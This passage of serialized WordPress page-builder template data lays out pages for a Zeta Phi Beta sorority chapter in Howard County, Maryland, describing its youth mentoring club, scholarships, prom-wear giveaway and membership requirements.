Format\";s:8:\"elements\";a:1:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:2:{i:0;a:2:{s:4:\"size\";i:9;s:8:\"elements\";a:5:{i:0;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:14:\"Amicette Club \";s:11:\"title-color\";s:7:\"#2741a6\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:16:\"lineariconcenter\";s:4:\"size\";s:2:\"h1\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:1269:\"<p>Lambda Gamma Zeta is dedicated to serving the youth of Howard County, Maryland. We currently support youth in the community by providing scholarships for deserving high school seniors and women attending Howard Community College, offering free prom wear to young ladies at our <em>A Pretty and Polished Affair</em>, and giving breakfast to students on the morning of their SAT exam through our <em>Breakfast on the Go</em> program.</p><p>As a partner with the Howard County Public School System, our chapter has expanded our service to the youth in the community by offering the <span style=--quote--color: #2741a6;--quote--><strong>Amicette Club</strong>,</span> a youth auxiliary program for young ladies aged 9-13. The focus of the program is to mentor young ladies and assist in their cultural, social, and educational growth. We will accomplish these goals through fun and engaging workshops like <em>A Girls Guide to Slaying High School</em>, community service activities, and excursions to local high schools and universities.</p><p>Any young lady with a desire and commitment to leadership and serving the community should contact LGZ for more information about the <strong><span style=--quote--color: #2741a6;--quote-->Amicette Club. </span></strong></p>\";s:11:\"admin-label\";s:0:\"\";}i:2;a:6:{s:4:\"type\";s:4:\"icon\";s:4:\"icon\";s:14:\"icon-threedots\";s:9:\"icon-size\";s:0:\"\";s:10:\"icon-color\";s:7:\"#2741a6\";s:10:\"icon-align\";s:6:\"center\";s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:4;a:3:{s:4:\"type\";s:7:\"sidebar\";s:10:\"sidebar-id\";s:24:\"ts-sidebar-586bd3c733846\";s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:3;s:8:\"elements\";a:3:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:60:\"https://zphiblgz.org/wp-content/uploads/2016/12/amicette.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:2;a:10:{s:4:\"type\";s:6:\"events\";s:11:\"admin-label\";s:0:\"\";s:8:\"category\";s:2:\"43\";s:10:\"id-exclude\";s:0:\"\";s:13:\"exclude-first\";s:0:\"\";s:11:\"posts-limit\";s:0:\"\";s:8:\"order-by\";s:4:\"date\";s:15:\"order-direction\";s:4:\"desc\";s:15:\"special-effects\";s:4:\"none\";s:10:\"pagination\";s:1:\"n\";}}}}}}}s:22:\"ts-template-1536975682\";a:2:{s:4:\"name\";s:9:\"Home Page\";s:8:\"elements\";a:5:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"left\";s:13:\"bgAttachement\";s:5:\"fixed\";s:8:\"bgRepeat\";s:6:\"repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:3:\"-60\";s:15:\"rowMarginBottom\";s:2:\"70\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:3:\"yes\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:1:{i:0;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:2:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:81:\"https://zphiblgz.org/wp-content/uploads/2017/09/ZPB_Unified_Visual_Identi-266.jpg\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}i:1;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:25:\"Lambda Gamma Zeta Chapter\";s:11:\"title-color\";s:7:\"#2041a5\";s:8:\"subtitle\";s:17:\"Howard County, MD\";s:14:\"subtitle-color\";s:7:\"#2041a5\";s:5:\"style\";s:6:\"2lines\";s:4:\"size\";s:2:\"h4\";s:11:\"admin-label\";s:0:\"\";}}}}}i:1;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:1:{i:0;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:4:{i:0;a:3:{s:4:\"type\";s:6:\"slider\";s:9:\"slider-id\";i:567;s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:2;a:6:{s:4:\"type\";s:14:\"features-block\";s:14:\"features-block\";s:1088:\"[{\"id\":\"1418893151521\",\"icon\":\"icon-graduate\",\"title\":\"Scholarship \",\"text\":\"We encourage the highest standards of scholastic achievement to foster a greater sense of unity within our Sorority and the community. \",\"url\":\"\",\"background\":\"#2741a6\",\"font\":\"#ffffff\"},{\"id\":\"1418893243854\",\"icon\":\"icon-social\",\"title\":\"Service \",\"text\":\"Our founding principle of service is at the heart of what all Zeta’s strive for – being a friend to man. Our national initiative Z-HOPE helps ensure that we support those in need.\",\"url\":\"\",\"background\":\"#2741a6\",\"font\":\"#ffffff\"},{\"id\":\"1418893259179\",\"icon\":\"icon-heart\",\"title\":\"Sisterhood \",\"text\":\"Zeta fosters a bond, like no other. Our support for one another is the foundation of our organization. \",\"url\":\"\",\"background\":\"#2741a6\",\"font\":\"#ffffff\"},{\"id\":\"1418910538758\",\"icon\":\"icon-team\",\"title\":\"Finer Womanhood \",\"text\":\"Our most unique principle of finer womanhood defines the image we choose to project and the manner in which we conduct ourselves – we are the definition of FINER.\",\"url\":\"\",\"background\":\"#2741a6\",\"font\":\"#ffffff\"}]\";s:16:\"elements-per-row\";s:1:\"4\";s:5:\"style\";s:6:\"style2\";s:11:\"admin-label\";s:0:\"\";s:6:\"gutter\";s:6:\"gutter\";}i:3;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}}}}}i:2;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"left\";s:13:\"bgAttachement\";s:5:\"fixed\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:2:\"40\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:5:{i:0;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:6:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}i:1;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:20:\"President\'s Welcome \";s:11:\"title-color\";s:7:\"#3f4549\";s:8:\"subtitle\";s:25:\"Cherice Daniel, 2017-2018\";s:14:\"subtitle-color\";s:7:\"#2741a6\";s:5:\"style\";s:10:\"simpleleft\";s:4:\"size\";s:2:\"h4\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:15;s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:1766:\"<p><span style=--quote--font-weight: 400;--quote-->Greetings!</span></p><p><span style=--quote--font-weight: 400;--quote-->It gives me great pleasure to welcome you to the official website of Lambda Gamma Zeta Chapter of Zeta Phi Beta Sorority, Incorporated. For over 35 years, the distinguished women of the Lambda Gamma Zeta Chapter </span><span style=--quote--font-weight: 400;--quote-->have proudly served Howard County, Maryland with the sorority’s founding principles of scholarship, service, sisterhood, and finer womanhood in mind.</span><span style=--quote--font-weight: 400;--quote--> As you explore our site, we hope that you will become excited about our </span><span style=--quote--font-weight: 400;--quote-->National Service Program </span><b>ZHOPE®</b><span style=--quote--font-weight: 400;--quote--> (Zetas Helping Other People Excel) and </span><span style=--quote--font-weight: 400;--quote-->want to join us in our efforts to serve locally in Howard County, nationally, and internationally.</span></p><p><span style=--quote--font-weight: 400;--quote-->We invite all members of the community, especially Sorors looking to reconnect with a chapter, exceptional women interested in membership and organizations interested in forming partnerships, to browse our site, attend our events and contact us for additional information. We appreciate your interest and look forward to engaging with you. </span></p><p><a href=--quote--https://zphiblgz.org/wp-content/uploads/2014/12/905736873100616160117.png--quote--><img class=--quote--alignnone  wp-image-971--quote-- src=--quote--https://zphiblgz.org/wp-content/uploads/2014/12/905736873100616160117.png--quote-- alt=--quote----quote-- width=--quote--130--quote-- height=--quote--27--quote-- /></a></p>\";s:11:\"admin-label\";s:0:\"\";}i:4;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:15;s:11:\"admin-label\";s:0:\"\";}i:5;a:6:{s:4:\"type\";s:4:\"icon\";s:4:\"icon\";s:14:\"icon-threedots\";s:9:\"icon-size\";s:2:\"24\";s:10:\"icon-color\";s:7:\"#2741a6\";s:10:\"icon-align\";s:6:\"center\";s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:4;s:8:\"elements\";a:1:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:54:\"https://zphiblgz.org/wp-content/uploads/2014/12/c1.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:5:\"_self\";s:5:\"align\";s:4:\"left\";}}}i:2;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}}}i:3;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:5:{i:0;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:15:\"Upcoming Events\";s:11:\"title-color\";s:7:\"#3f4549\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#F8CABA\";s:5:\"style\";s:9:\"lineafter\";s:4:\"size\";s:2:\"h3\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:30;s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:103:\"<p><em>LGZ is always busy serving the community. Check back soon to see our upcoming events. </em></p>\";s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:30;s:11:\"admin-label\";s:0:\"\";}i:4;a:10:{s:4:\"type\";s:6:\"events\";s:11:\"admin-label\";s:0:\"\";s:8:\"category\";s:26:\"52,51,23,44,53,69,55,43,54\";s:10:\"id-exclude\";s:0:\"\";s:13:\"exclude-first\";s:0:\"\";s:11:\"posts-limit\";s:1:\"6\";s:8:\"order-by\";s:10:\"start-date\";s:15:\"order-direction\";s:3:\"asc\";s:15:\"special-effects\";s:4:\"none\";s:10:\"pagination\";s:1:\"n\";}}}i:4;a:2:{s:4:\"size\";i:4;s:8:\"elements\";a:6:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:50;s:11:\"admin-label\";s:0:\"\";}i:1;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:59:\"https://zphiblgz.org/wp-content/uploads/2014/12/LGZ-Pic.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:5:\"_self\";s:5:\"align\";s:6:\"center\";}i:2;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}i:4;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}i:5;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:61:\"https://zphiblgz.org/wp-content/uploads/2014/12/ServingHC.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}}}}}i:3;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:7:\"#2741a6\";s:9:\"textColor\";s:7:\"#ffffff\";s:12:\"rowMaskColor\";s:7:\"#2741a6\";s:7:\"rowMask\";s:3:\"yes\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:62:\"https://zphiblgz.org/wp-content/uploads/2014/12/Membership.png\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"left\";s:13:\"bgAttachement\";s:6:\"scroll\";s:8:\"bgRepeat\";s:6:\"repeat\";s:6:\"bgSize\";s:5:\"cover\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:2:\"70\";s:13:\"rowPaddingTop\";s:2:\"70\";s:16:\"rowPaddingBottom\";s:2:\"70\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:90;}s:7:\"columns\";a:4:{i:0;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:2:{i:0;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:10:\"Membership\";s:11:\"title-color\";s:7:\"#ffffff\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#eaeced\";s:5:\"style\";s:8:\"linerect\";s:4:\"size\";s:2:\"h1\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:60;s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:8:{i:0;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:28:\"Looking for a new Zeta home?\";s:11:\"title-color\";s:7:\"#ffffff\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:10:\"simpleleft\";s:4:\"size\";s:2:\"h5\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:462:\"<p>If you are a <em>Zeta</em> looking for a home, new to the area, or interested in becoming active with <em>Zeta</em> again, <em><strong>Lambda Gamma Zeta</strong></em> Chapter of Howard County may be the place for you. We are a group of multi-talented, phenomenal women committed to the ideals and principles of Zeta. We invite and encourage Sorors to visit our chapter meetings and upcoming events. Complete the contact form below to find out more.</p>\";s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:35;s:11:\"admin-label\";s:0:\"\";}i:4;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:25:\"Interested in membership?\";s:11:\"title-color\";s:7:\"#ffffff\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:10:\"simpleleft\";s:4:\"size\";s:2:\"h5\";s:11:\"admin-label\";s:0:\"\";}i:5;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:6;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:547:\"<p>Although membership in Zeta Phi Beta Sorority, Inc. is by invitation only, Lambda Gamma Zeta Chapter of Howard County is interested in  women who have demonstrated a commitment to community service, scholarship, sisterhood, and finer womanhood. Women who exhibit these principles and meet the educational requirements are encouraged to express formal interest in membership through contacting us and attending one of our Informational Interest Meetings. To find out more, complete the contact form below.</p><p>Education Requirements: </p>\";s:11:\"admin-label\";s:0:\"\";}i:7;a:3:{s:4:\"type\";s:10:\"shortcodes\";s:11:\"admin-label\";s:0:\"\";s:10:\"shortcodes\";s:165:\"[ts_row]<span style=\"color: #FFFFFF;\">[icon size=\"24\" icon=\"icon-tick\" display=\"true\" ][/icon]</span>Bachelor\'s Degree (2.5 GPA within 3 years) OR Advanced Degree\n\n\n\";}}}i:2;a:2:{s:4:\"size\";i:4;s:8:\"elements\";a:2:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:80;s:11:\"admin-label\";s:0:\"\";}i:1;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:68:\"https://zphiblgz.org/wp-content/uploads/2014/12/We-Want-You-Back.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}}}i:3;a:2:{s:4:\"size\";i:7;s:8:\"elements\";a:1:{i:0;a:4:{s:4:\"type\";s:10:\"shortcodes\";s:11:\"admin-label\";s:0:\"\";s:8:\"paddings\";s:1:\"n\";s:10:\"shortcodes\";s:53:\"[gravityform id=\"10\" title=\"true\" description=\"true\"]\";}}}}}i:4;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:1:{i:0;a:2:{s:4:\"size\";i:12;s:8:\"elements\";a:3:{i:0;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:11:\"Recent News\";s:11:\"title-color\";s:7:\"#3f4549\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#bdc0c2\";s:5:\"style\";s:10:\"simpleleft\";s:4:\"size\";s:2:\"h3\";s:11:\"admin-label\";s:0:\"\";}i:1;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:20;s:11:\"admin-label\";s:0:\"\";}i:2;a:17:{s:4:\"type\";s:10:\"last-posts\";s:8:\"category\";s:1:\"2\";s:12:\"display-mode\";s:4:\"grid\";s:10:\"id-exclude\";s:0:\"\";s:13:\"exclude-first\";s:0:\"\";s:11:\"admin-label\";s:0:\"\";s:8:\"featured\";s:1:\"n\";s:8:\"behavior\";s:4:\"none\";s:13:\"display-title\";s:19:\"title-above-excerpt\";s:9:\"show-meta\";s:1:\"y\";s:16:\"elements-per-row\";s:1:\"3\";s:11:\"posts-limit\";s:0:\"\";s:8:\"order-by\";s:4:\"date\";s:15:\"order-direction\";s:4:\"desc\";s:15:\"special-effects\";s:4:\"none\";s:10:\"pagination\";s:1:\"n\";s:13:\"related-posts\";s:1:\"n\";}}}}}}}s:22:\"ts-template-1536988026\";a:2:{s:4:\"name\";s:13:\"Page Template\";s:8:\"elements\";a:1:{i:0;a:2:{s:8:\"settings\";a:26:{s:7:\"rowName\";s:0:\"\";s:7:\"bgColor\";s:11:\"transparent\";s:9:\"textColor\";s:7:\"inherit\";s:12:\"rowMaskColor\";s:7:\"inherit\";s:7:\"rowMask\";s:2:\"no\";s:9:\"rowShadow\";s:2:\"no\";s:11:\"textOpacity\";s:0:\"\";s:7:\"bgImage\";s:0:\"\";s:9:\"bgVideoMp\";s:0:\"\";s:11:\"bgVideoWebm\";s:0:\"\";s:10:\"bgPosition\";s:4:\"auto\";s:13:\"bgAttachement\";s:0:\"\";s:8:\"bgRepeat\";s:9:\"no-repeat\";s:6:\"bgSize\";s:4:\"auto\";s:12:\"rowMarginTop\";s:1:\"0\";s:15:\"rowMarginBottom\";s:1:\"0\";s:13:\"rowPaddingTop\";s:1:\"0\";s:16:\"rowPaddingBottom\";s:1:\"0\";s:9:\"expandRow\";s:2:\"no\";s:14:\"specialEffects\";s:4:\"none\";s:12:\"rowTextAlign\";s:4:\"auto\";s:13:\"fullscreenRow\";s:2:\"no\";s:16:\"rowVerticalAlign\";s:3:\"top\";s:16:\"scrollDownButton\";s:2:\"no\";s:9:\"customCss\";s:0:\"\";s:10:\"rowOpacity\";i:0;}s:7:\"columns\";a:4:{i:0;a:2:{s:4:\"size\";i:2;s:8:\"elements\";a:1:{i:0;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}}}i:1;a:2:{s:4:\"size\";i:8;s:8:\"elements\";a:6:{i:0;a:7:{s:4:\"type\";s:5:\"image\";s:9:\"image-url\";s:60:\"https://zphiblgz.org/wp-content/uploads/2017/01/APPALogo.png\";s:11:\"forward-url\";s:0:\"\";s:12:\"image-target\";s:6:\"_blank\";s:11:\"admin-label\";s:0:\"\";s:6:\"retina\";s:1:\"y\";s:5:\"align\";s:6:\"center\";}i:1;a:9:{s:4:\"type\";s:5:\"title\";s:10:\"title-icon\";s:11:\"icon-noicon\";s:5:\"title\";s:27:\"A Pretty & Polished Affair \";s:11:\"title-color\";s:7:\"#2741a6\";s:8:\"subtitle\";s:0:\"\";s:14:\"subtitle-color\";s:7:\"#3f4549\";s:5:\"style\";s:16:\"lineariconcenter\";s:4:\"size\";s:2:\"h1\";s:11:\"admin-label\";s:0:\"\";}i:2;a:3:{s:4:\"type\";s:4:\"text\";s:4:\"text\";s:2059:\"<p>Prom is a celebration of years of friendships and hard work in high school and every young woman deserves to attend it looking her best. We want to make a few high school students’ dream come true, regardless of their financial situation. </p><p>In 2014 LGZ launched <strong><span style=--quote--color: #2341a5;--quote-->A Pretty and Polished Affair</span> </strong>to ensure that each girl in Howard County, MD had the opportunity to feel beautiful on their special day. The event provides a full boutique experience for each young lady including a personal shopper to help them with their dress and accessories, basic alterations, hair and makeup tips and the opportunity to win raffled prizes. The event is free of cost and is held each year prior to prom season. Although the event is held in Howard County, young ladies are welcomed from neighboring counties. <a href=--quote--https://zphiblgz.org/wp-content/uploads/2017/01/becca.png--quote--><img class=--quote--size-full wp-image-782 alignright--quote-- src=--quote--https://zphiblgz.org/wp-content/uploads/2017/01/becca.png--quote-- alt=--quote--becca--quote-- width=--quote--200--quote-- height=--quote--100--quote-- /></a></p><p>In 2017, LGZ made a very important partnership with Altholton High School\'s chapter of <strong><span style=--quote--color: #ff99cc;--quote-->Becca\'s Closet.</span></strong> Becca\'s Closet is an organization who has worked tirelessly to provide young women around the country the prom attire they deserve. </p><h4>Donors & Community Partners</h4><p>Each year we accept donations of gently worn formal attire, shoes, and accessories and donations of gift cards and services. If you would like to contribute or become an event donor or community partner contact us at <span style=--quote--color: #2341a5;--quote-->appa@zphiblgz.org</span>, for more information. </p><p><em><span style=--quote--color: #2341a5;--quote--><strong>A special thank you for all of our donors and community partners for last years\' successful event. </strong></span></em></p><p> </p>\";s:11:\"admin-label\";s:0:\"\";}i:3;a:3:{s:4:\"type\";s:6:\"spacer\";s:6:\"height\";i:40;s:11:\"admin-label\";s:0:\"\";}i:4;a:4:{s:4:\"type\";s:14:\"image-carousel\";s:15:\"carousel-height\";s:3:\"400\";s:6:\"images\";s:1048:\"1077:https://zphiblgz.org/wp-content/uploads/2017/01/Icing.png,1076:https://zphiblgz.org/wp-content/uploads/2017/01/Sweets.png,1075:https://zphiblgz.org/wp-content/uploads/2017/01/chcares.png,1074:https://zphiblgz.org/wp-content/uploads/2017/01/CCSC.png,1073:https://zphiblgz.org/wp-content/uploads/2017/01/Nordstrom.png,1072:https://zphiblgz.org/wp-content/uploads/2017/01/ALDO.png,1071:https://zphiblgz.org/wp-content/uploads/2017/01/CharlotteRuss-1.png,1070:https://zphiblgz.org/wp-content/uploads/2017/01/Sephora.png,1069:https://zphiblgz.org/wp-content/uploads/